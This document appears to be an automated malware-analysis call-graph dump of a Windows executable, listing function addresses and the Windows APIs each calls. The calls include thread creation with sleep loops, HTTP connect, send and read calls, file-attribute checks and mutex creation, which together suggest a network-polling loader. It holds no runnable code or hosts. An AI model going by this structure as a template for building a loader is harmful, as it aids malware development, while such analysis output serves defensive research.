Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr _unexpected 36839->36935 36840 652910 36842 65290d 36840->36842 36906 6526f2 36840->36906 36846 64adf5 __freea RtlAllocateHeap 36842->36846 36844 652907 36854 652517 36844->36854 36848 65291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36846->36848 36847 6528bf 36849 64adf5 __freea RtlAllocateHeap 36847->36849 36848->36813 36849->36851 36850 6528b8 36850->36847 36852 6528e5 36850->36852 36851->36840 36851->36844 36853 64adf5 __freea RtlAllocateHeap 36852->36853 36853->36851 36855 652526 36854->36855 36856 652191 RtlAllocateHeap 36855->36856 36857 65253c 36856->36857 36858 652139 RtlAllocateHeap 36857->36858 36859 6526c1 ___std_exception_copy 36857->36859 36861 65254e 36858->36861 36863 652191 RtlAllocateHeap 36859->36863 36904 6526c8 36859->36904 36860 64adf5 __freea RtlAllocateHeap 36862 65259e 36860->36862 36861->36859 36861->36860 36861->36904 36936 64b04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr _unexpected 36862->36936 36864 652717 36863->36864 36866 652139 RtlAllocateHeap 36864->36866 36873 652842 ___std_exception_copy 36864->36873 36867 652729 36866->36867 36870 652165 RtlAllocateHeap 36867->36870 36867->36873 36868 6525b6 36869 64adf5 __freea RtlAllocateHeap 36868->36869 36875 6525c2 36869->36875 36871 65273b 36870->36871 36872 652744 36871->36872 36871->36873 36874 64adf5 __freea RtlAllocateHeap 36872->36874 36892 6528a0 36873->36892 36944 64b04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr _unexpected 36873->36944 36876 65274f GetTimeZoneInformation 36874->36876 36875->36904 36937 64a1f1 RtlAllocateHeap __dosmaperr ___std_exception_copy 36875->36937 36891 65276b 36876->36891 36898 6527be __cftof 36876->36898 36877 652910 36880 65290d 36877->36880 36881 6526f2 5 API calls 36877->36881 36885 64adf5 __freea RtlAllocateHeap 36880->36885 36881->36880 36882 652907 36884 652517 5 API calls 36882->36884 36883 6525ec 36883->36859 36938 654a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 36883->36938 36884->36880 36887 65291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36885->36887 36886 6528bf 36889 64adf5 __freea RtlAllocateHeap 36886->36889 36887->36842 36889->36892 36890 6528b8 36890->36886 36893 6528e5 36890->36893 36943 64ef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 36891->36943 36892->36877 36892->36882 36895 64adf5 __freea RtlAllocateHeap 36893->36895 36895->36892 36896 652605 36896->36859 36939 648bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36896->36939 36898->36842 36899 65262a 36900 652680 36899->36900 36940 648bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36899->36940 36900->36904 36942 654a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 36900->36942 36902 652651 36902->36900 36941 648bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36902->36941 36904->36842 36907 652701 36906->36907 36908 652191 RtlAllocateHeap 36907->36908 36909 652717 36908->36909 36910 652139 RtlAllocateHeap 36909->36910 36915 652842 ___std_exception_copy 36909->36915 36911 652729 36910->36911 36912 652165 RtlAllocateHeap 36911->36912 36911->36915 36913 65273b 36912->36913 36914 652744 36913->36914 36913->36915 36916 64adf5 __freea RtlAllocateHeap 36914->36916 36930 6528a0 36915->36930 36946 64b04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr _unexpected 36915->36946 36917 65274f GetTimeZoneInformation 36916->36917 36929 65276b 36917->36929 36934 6527be __cftof 36917->36934 36918 652910 36920 65290d 36918->36920 36921 6526f2 5 API calls 36918->36921 36924 64adf5 __freea RtlAllocateHeap 36920->36924 36921->36920 36922 652907 36923 652517 5 API calls 36922->36923 36923->36920 36926 65291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36924->36926 36925 6528bf 36927 64adf5 __freea RtlAllocateHeap 36925->36927 36926->36842 36927->36930 36928 6528b8 36928->36925 36931 6528e5 36928->36931 36945 64ef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 36929->36945 36930->36918 36930->36922 36933 64adf5 __freea RtlAllocateHeap 36931->36933 36933->36930 36934->36842 36935->36850 36936->36868 36937->36883 36938->36896 36939->36899 36940->36902 36941->36900 36942->36859 36943->36898 36944->36890 36945->36934 36946->36928 36947->36822 36948->36829 36949->36836 36950 626d00 CreateThread 36951 626d20 Sleep 36950->36951 36952 626c70 36950->36952 36951->36951 36955 626ca0 36952->36955 36953 627a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36953->36955 36954 615c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 36954->36955 36955->36953 36955->36954 36958 6247b0 36955->36958 36957 626cec Sleep 36957->36955 36959 6247eb 36958->36959 36962 624ee3 Concurrency::details::_TaskCollection::_ReleaseAlias 36958->36962 36961 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36959->36961 36959->36962 36960 624f59 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 36960->36957 36963 62480c 36961->36963 36962->36960 36965 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36962->36965 36964 615c10 5 API calls 36963->36964 36966 624813 36964->36966 36967 624fba 36965->36967 36968 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36966->36968 36969 624825 36968->36969 36970 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36969->36970 36971 624837 36970->36971 37068 61be30 36971->37068 36973 624843 36974 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36973->36974 36975 624858 36974->36975 36976 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36975->36976 36977 624870 36976->36977 36978 615c10 5 API calls 36977->36978 36979 624877 36978->36979 37095 618580 36979->37095 36981 624883 36982 624afd 36981->36982 36983 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36981->36983 36984 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36982->36984 37039 624f9c 36982->37039 36985 62489f 36983->36985 36986 624b2f 36984->36986 36987 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36985->36987 36988 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36986->36988 36989 6248b7 36987->36989 36990 624b44 36988->36990 36991 615c10 5 API calls 36989->36991 36992 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36990->36992 36993 6248be 36991->36993 36994 624b56 36992->36994 36995 618580 2 API calls 36993->36995 36996 61be30 11 API calls 36994->36996 36997 6248ca 36995->36997 36998 624b62 36996->36998 36997->36982 37000 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36997->37000 36999 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36998->36999 37001 624b77 36999->37001 37002 6248e7 37000->37002 37003 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37001->37003 37004 615c10 5 API calls 37002->37004 37005 624b8f 37003->37005 37009 6248ef 37004->37009 37006 615c10 5 API calls 37005->37006 37007 624b96 37006->37007 37008 618580 2 API calls 37007->37008 37010 624ba2 37008->37010 37011 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37009->37011 37012 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37010->37012 37014 624e70 Concurrency::details::_TaskCollection::_ReleaseAlias 37010->37014 37022 624959 Concurrency::details::_TaskCollection::_ReleaseAlias 37011->37022 37013 624bbe 37012->37013 37015 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37013->37015 37014->36962 37017 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37014->37017 37016 624bd6 37015->37016 37019 615c10 5 API calls 37016->37019 37017->36962 37018 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37020 6249e6 37018->37020 37021 624bdd 37019->37021 37023 615c10 5 API calls 37020->37023 37024 618580 2 API calls 37021->37024 37022->37018 37027 6249ee 37023->37027 37025 624be9 37024->37025 37025->37014 37026 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37025->37026 37028 624c06 37026->37028 37029 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37027->37029 37030 615c10 5 API calls 37028->37030 37031 624a49 Concurrency::details::_TaskCollection::_ReleaseAlias 37029->37031 37032 624c0e 37030->37032 37031->36982 37125 6198f0 37031->37125 37033 624f97 37032->37033 37034 624c5a 37032->37034 37137 628200 RtlAllocateHeap RtlAllocateHeap 37033->37137 37037 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37034->37037 37047 624c78 Concurrency::details::_TaskCollection::_ReleaseAlias 37037->37047 37038 624ad5 37038->36982 37041 6475f6 __dosmaperr RtlAllocateHeap 37038->37041 37138 62c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 37039->37138 37043 624ade 37041->37043 37042 624fa6 37046 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37042->37046 37133 648ab6 37043->37133 37044 624cec Concurrency::details::_TaskCollection::_ReleaseAlias 37045 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37044->37045 37049 624d05 37045->37049 37050 624fab 37046->37050 37047->37042 37047->37044 37051 615c10 5 API calls 37049->37051 37052 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37050->37052 37053 624d0d 37051->37053 37052->37014 37054 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37053->37054 37056 624d68 Concurrency::details::_TaskCollection::_ReleaseAlias 37054->37056 37055 624ddc Concurrency::details::_TaskCollection::_ReleaseAlias 37057 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37055->37057 37056->37050 37056->37055 37058 624df7 37057->37058 37059 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37058->37059 37060 624e0c 37059->37060 37061 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37060->37061 37062 624e27 37061->37062 37063 615c10 5 API calls 37062->37063 37064 624e2e 37063->37064 37065 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37064->37065 37066 624e67 37065->37066 37104 624390 37066->37104 37069 61c281 37068->37069 37070 61be82 37068->37070 37071 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37069->37071 37070->37069 37072 61be96 Sleep InternetOpenW InternetConnectA 37070->37072 37079 61c22e Concurrency::details::_TaskCollection::_ReleaseAlias 37071->37079 37073 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37072->37073 37074 61bf18 37073->37074 37075 615c10 5 API calls 37074->37075 37076 61bf23 HttpOpenRequestA 37075->37076 37082 61bf4c Concurrency::details::_TaskCollection::_ReleaseAlias 37076->37082 37077 61c27c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37077->36973 37078 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37081 61c354 37078->37081 37079->37077 37079->37078 37083 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37082->37083 37084 61bfb4 37083->37084 37085 615c10 5 API calls 37084->37085 37086 61bfbf 37085->37086 37087 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37086->37087 37088 61bfd8 37087->37088 37089 615c10 5 API calls 37088->37089 37090 61bfe3 HttpSendRequestA 37089->37090 37092 61c006 Concurrency::details::_TaskCollection::_ReleaseAlias 37090->37092 37093 61c08e InternetReadFile 37092->37093 37094 61c0b5 __InternalCxxFrameHandler 37093->37094 37097 6186a0 Concurrency::details::_TaskCollection::_ReleaseAlias 37095->37097 37103 6185d5 Concurrency::details::_TaskCollection::_ReleaseAlias 37095->37103 37096 618767 37139 628200 RtlAllocateHeap RtlAllocateHeap 37096->37139 37100 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37097->37100 37101 618740 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37097->37101 37098 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37098->37103 37102 618771 37100->37102 37101->36981 37103->37096 37103->37097 37103->37098 37105 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37104->37105 37106 6243d2 37105->37106 37107 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37106->37107 37108 6243e4 37107->37108 37109 618580 2 API calls 37108->37109 37110 6243ed 37109->37110 37111 624646 37110->37111 37123 6243f8 Concurrency::details::_TaskCollection::_ReleaseAlias 37110->37123 37112 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37111->37112 37113 624657 37112->37113 37114 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37113->37114 37115 62466c 37114->37115 37117 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37115->37117 37116 6280c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37116->37123 37118 62467e 37117->37118 37120 623640 13 API calls 37118->37120 37121 624610 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37120->37121 37121->37014 37122 627a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37122->37123 37123->37116 37123->37121 37123->37122 37140 629280 37123->37140 37145 623640 37123->37145 37126 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37125->37126 37127 61991e 37126->37127 37128 615c10 5 API calls 37127->37128 37129 619927 Concurrency::details::ResourceManager::SetupStaticAllocationData 37128->37129 37130 6199c6 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37129->37130 37131 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37129->37131 37130->37038 37132 6199f2 37131->37132 37134 648ad1 37133->37134 37286 648868 37134->37286 37138->37042 37141 629294 37140->37141 37144 6292a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37141->37144 37276 6294e0 2 API calls 4 library calls 37141->37276 37143 62932b 37143->37123 37144->37123 37146 62367f 37145->37146 37149 623e6f Concurrency::details::_TaskCollection::_ReleaseAlias 37145->37149 37147 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37146->37147 37148 6236b0 37147->37148 37150 624327 37148->37150 37153 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37148->37153 37151 624302 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37149->37151 37154 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37149->37154 37281 628200 RtlAllocateHeap RtlAllocateHeap 37150->37281 37151->37123 37156 6236ff 37153->37156 37154->37149 37155 62432c 37282 628200 RtlAllocateHeap RtlAllocateHeap 37155->37282 37156->37150 37159 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37156->37159 37158 624331 37160 624336 37158->37160 37161 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37158->37161 37162 623743 37159->37162 37164 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37160->37164 37161->37160 37162->37150 37163 623765 37162->37163 37165 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37163->37165 37166 62433b 37164->37166 37168 623785 37165->37168 37283 628200 RtlAllocateHeap RtlAllocateHeap 37166->37283 37170 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37168->37170 37169 624340 37171 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37169->37171 37172 623798 37170->37172 37173 624345 37171->37173 37174 615c10 5 API calls 37172->37174 37175 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37173->37175 37178 6237a3 37174->37178 37176 62434a 37175->37176 37284 62c199 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 37176->37284 37178->37155 37179 6237ef 37178->37179 37181 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37179->37181 37180 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37182 624359 37180->37182 37183 623811 37181->37183 37285 62c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 37182->37285 37183->37158 37185 623845 Concurrency::details::_TaskCollection::_ReleaseAlias 37183->37185 37186 6198f0 5 API calls 37185->37186 37187 623872 37186->37187 37188 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37187->37188 37275 623c79 Concurrency::details::_TaskCollection::_ReleaseAlias 37187->37275 37189 623889 37188->37189 37190 615c10 5 API calls 37189->37190 37191 623894 37190->37191 37192 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37191->37192 37194 6238dc Concurrency::details::_TaskCollection::_ReleaseAlias 37192->37194 37193 62397e Concurrency::details::_TaskCollection::_ReleaseAlias 37193->37166 37195 6239bd 37193->37195 37247 623b49 Concurrency::details::_TaskCollection::_ReleaseAlias 37193->37247 37194->37160 37194->37193 37197 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37195->37197 37196 6475f6 __dosmaperr RtlAllocateHeap 37198 623b58 37196->37198 37199 6239da 37197->37199 37200 648ab6 4 API calls 37198->37200 37277 61ad70 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 37199->37277 37201 623b7a 37200->37201 37201->37176 37203 623b89 37201->37203 37203->37182 37205 623ba2 37203->37205 37206 623f42 37203->37206 37207 623e74 37203->37207 37208 623c8d 37203->37208 37203->37275 37204 623a77 Concurrency::details::_TaskCollection::_ReleaseAlias 37209 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37204->37209 37210 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37205->37210 37213 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37206->37213 37211 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37207->37211 37214 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37208->37214 37212 623a96 37209->37212 37216 623bca 37210->37216 37217 623e9c 37211->37217 37218 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37212->37218 37219 623f56 37213->37219 37220 623cb5 37214->37220 37215 6239e5 Concurrency::details::_TaskCollection::_ReleaseAlias 37215->37169 37215->37204 37221 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37216->37221 37222 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37217->37222 37223 623aa8 37218->37223 37224 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37219->37224 37225 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37220->37225 37226 623be8 37221->37226 37227 623eba 37222->37227 37278 6149a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_TaskCollection::_ReleaseAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 37223->37278 37229 623f6e 37224->37229 37230 623cd3 37225->37230 37231 615c10 5 API calls 37226->37231 37232 615c10 5 API calls 37227->37232 37233 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37229->37233 37234 615c10 5 API calls 37230->37234 37237 623bef 37231->37237 37238 623ec1 37232->37238 37235 623f86 37233->37235 37236 623cda 37234->37236 37240 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37235->37240 37241 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37236->37241 37242 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37237->37242 37239 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37238->37239 37243 623ed9 37239->37243 37245 623f98 37240->37245 37246 623cef 37241->37246 37248 623c07 37242->37248 37249 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37243->37249 37244 623ab7 Concurrency::details::_TaskCollection::_ReleaseAlias 37244->37173 37244->37247 37280 622f10 13 API calls 4 library calls 37245->37280 37251 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37246->37251 37247->37196 37252 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37248->37252 37253 623ef1 37249->37253 37254 623d07 37251->37254 37255 623c1f 37252->37255 37256 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37253->37256 37257 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37254->37257 37258 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37255->37258 37260 623f09 37256->37260 37261 623d1f 37257->37261 37259 623c37 37258->37259 37262 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37259->37262 37263 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37260->37263 37264 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37261->37264 37265 623c4f 37262->37265 37266 623f21 37263->37266 37267 623d37 37264->37267 37268 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37265->37268 37269 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37266->37269 37270 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37267->37270 37271 623c67 37268->37271 37269->37271 37272 623d49 37270->37272 37274 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37271->37274 37279 621ec0 13 API calls 4 library calls 37272->37279 37274->37275 37275->37149 37275->37180 37276->37143 37277->37215 37278->37244 37279->37275 37280->37275 37285->37149 37304 64868d 37286->37304 37288 6488b3 37312 64690a 37288->37312 37290 64888f 37292 6475f6 __dosmaperr RtlAllocateHeap 37290->37292 37291 64887a 37291->37288 37291->37290 37303 64889f 37291->37303 37293 648894 37292->37293 37311 646c5a RtlAllocateHeap ___std_exception_copy 37293->37311 37296 6488bf 37297 6488ee 37296->37297 37320 646d52 4 API calls 2 library calls 37296->37320 37300 648958 37297->37300 37321 648a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 37297->37321 37322 648a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 37300->37322 37301 648a20 37302 6475f6 __dosmaperr RtlAllocateHeap 37301->37302 37301->37303 37302->37303 37303->36982 37305 6486a5 37304->37305 37306 648692 37304->37306 37305->37291 37307 6475f6 __dosmaperr RtlAllocateHeap 37306->37307 37308 648697 37307->37308 37323 646c5a RtlAllocateHeap ___std_exception_copy 37308->37323 37310 6486a2 37310->37291 37311->37303 37313 64692a 37312->37313 37319 646921 37312->37319 37313->37319 37324 64a671 3 API calls 3 library calls 37313->37324 37315 64694a 37325 64b5fb GetPEB GetPEB RtlAllocateHeap __cftof 37315->37325 37317 646960 37326 64b628 GetPEB GetPEB RtlAllocateHeap __cftof 37317->37326 37319->37296 37320->37296 37321->37300 37322->37301 37323->37310 37324->37315 37325->37317 37326->37319 37341 61a682 GetFileAttributesA 37343 61a692 Concurrency::details::_TaskCollection::_ReleaseAlias 37341->37343 37342 61a949 37345 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37342->37345 37343->37342 37344 61a75d Concurrency::details::_TaskCollection::_ReleaseAlias 37343->37344 37349 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37344->37349 37346 61a94e 37345->37346 37347 61a953 Sleep CreateMutexA 37346->37347 37348 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37346->37348 37353 61a98e 37347->37353 37348->37347 37350 61a903 37349->37350 37352 61a9a7 37353->37352 37356 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37353->37356 37355 61a9b0 37356->37355 37357 619ba5 GetFileAttributesA 37359 619bb5 Concurrency::details::_TaskCollection::_ReleaseAlias 37357->37359 37358 61a91c 37360 61a953 Sleep CreateMutexA 37358->37360 37361 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37358->37361 37359->37358 37362 619c80 Concurrency::details::_TaskCollection::_ReleaseAlias 37359->37362 37367 61a98e 37360->37367 37361->37360 37364 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37362->37364 37365 61a903 37364->37365 37366 61a9a7 37367->37366 37370 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37367->37370 37369 61a9b0 37370->37369 37385 61a54d GetFileAttributesA 37387 61a55d Concurrency::details::_TaskCollection::_ReleaseAlias 37385->37387 37386 61a944 37388 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37386->37388 37387->37386 37390 61a628 Concurrency::details::_TaskCollection::_ReleaseAlias 37387->37390 37389 61a949 37388->37389 37391 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37389->37391 37392 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37390->37392 37393 61a94e 37391->37393 37394 61a903 37392->37394 37395 61a953 Sleep CreateMutexA 37393->37395 37396 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37393->37396 37399 61a98e 37395->37399 37396->37395 37398 61a9a7 37399->37398 37402 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37399->37402 37401 61a9b0 37402->37401 37403 620cad 37404 620f13 Concurrency::details::_TaskCollection::_ReleaseAlias 37403->37404 37405 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37404->37405 37406 620f34 37405->37406 37407 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37406->37407 37408 620f46 37407->37408 37443 61c360 37408->37443 37410 620f4f 37448 646729 37410->37448 37414 620f7f 37415 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37414->37415 37417 620f94 Concurrency::details::_TaskCollection::_ReleaseAlias 37415->37417 37416 6475f6 __dosmaperr RtlAllocateHeap 37418 62101e 37416->37418 37417->37416 37420 621168 37417->37420 37419 648ab6 4 API calls 37418->37419 37421 62104d 37419->37421 37421->37420 37422 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37421->37422 37423 62109d 37422->37423 37424 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37423->37424 37425 6210b8 37424->37425 37426 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37425->37426 37427 6210cd 37426->37427 37460 617590 Sleep 37427->37460 37429 6210d6 37430 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37429->37430 37431 621100 37430->37431 37432 615c10 5 API calls 37431->37432 37433 621107 37432->37433 37434 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37433->37434 37435 62111d 37434->37435 37436 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37435->37436 37437 621135 37436->37437 37438 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37437->37438 37439 62114d 37438->37439 37440 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37439->37440 37441 62115f 37440->37441 37478 61e530 37441->37478 37444 61c839 37443->37444 37445 61c8a1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37444->37445 37446 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37444->37446 37445->37410 37447 61c8db 37446->37447 37632 646672 37448->37632 37450 620f6e 37451 6467b7 37450->37451 37452 6467c3 ___scrt_is_nonwritable_in_current_image 37451->37452 37453 6467cd 37452->37453 37456 6467e2 ___scrt_uninitialize_crt 37452->37456 37454 6475f6 __dosmaperr RtlAllocateHeap 37453->37454 37455 6467d2 37454->37455 37657 646c5a RtlAllocateHeap ___std_exception_copy 37455->37657 37459 6467dd 37456->37459 37658 646740 3 API calls 4 library calls 37456->37658 37459->37414 37461 61765e 37460->37461 37462 6175e3 37460->37462 37464 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37461->37464 37659 62d111 SleepConditionVariableCS 37462->37659 37466 61767a 37464->37466 37465 6175ed 37465->37461 37660 62d64e RtlAllocateHeap RtlAllocateHeap 37465->37660 37467 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37466->37467 37468 617693 37467->37468 37470 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37468->37470 37472 6176ac CreateThread Sleep 37470->37472 37471 617654 37661 62d0c7 